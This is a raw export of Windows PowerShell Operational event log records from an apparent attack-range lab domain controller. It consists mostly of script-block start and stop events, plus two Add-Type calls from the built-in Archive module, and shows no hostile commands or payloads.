Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467255
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467254
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467253
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467252
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467251
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467250
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467249
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467248
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467247
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467246
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467245
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467244
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467243
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467242
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467241
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467240
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467239
Keywords=None
Message=Completed invocation of ScriptBlock ID: a29f05d0-a5c2-4f6a-9a5c-bc019b59fb08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=1467238
Keywords=None
Message=CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem"


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b0030b64-c114-4765-a95a-dacf53f2747d
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Engine Version = 5.1.14393.4402
        Runspace ID = c5f1100c-56fc-4347-871f-80d397213539
        Pipeline ID = 6
        Command Name = Add-Type
        Command Type = Cmdlet
        Script Name = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psm1
        Command Path = 
        Sequence Number = 60
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=1467237
Keywords=None
Message=CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression"


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b0030b64-c114-4765-a95a-dacf53f2747d
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Engine Version = 5.1.14393.4402
        Runspace ID = c5f1100c-56fc-4347-871f-80d397213539
        Pipeline ID = 6
        Command Name = Add-Type
        Command Type = Cmdlet
        Script Name = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psm1
        Command Path = 
        Sequence Number = 58
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467236
Keywords=None
Message=Started invocation of ScriptBlock ID: a29f05d0-a5c2-4f6a-9a5c-bc019b59fb08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467235
Keywords=None
Message=Started invocation of ScriptBlock ID: 64663673-3388-407d-9a69-709aa0010c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467234
Keywords=None
Message=Completed invocation of ScriptBlock ID: e777e58d-4feb-4ac0-b78e-6bff84134961
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467233
Keywords=None
Message=Started invocation of ScriptBlock ID: e777e58d-4feb-4ac0-b78e-6bff84134961
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467232
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467231
Keywords=None
Message=Started invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467230
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467229
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467228
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467227
Keywords=None
Message=Started invocation of ScriptBlock ID: 8321bdf9-4122-44bb-ad97-482e8549521d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467440
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467439
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467438
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467437
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467436
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467435
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467434
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467433
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467432
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467431
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467430
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467429
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467428
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467427
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467426
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467425
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467424
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467423
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467422
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467421
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467420
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467419
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467418
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467417
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
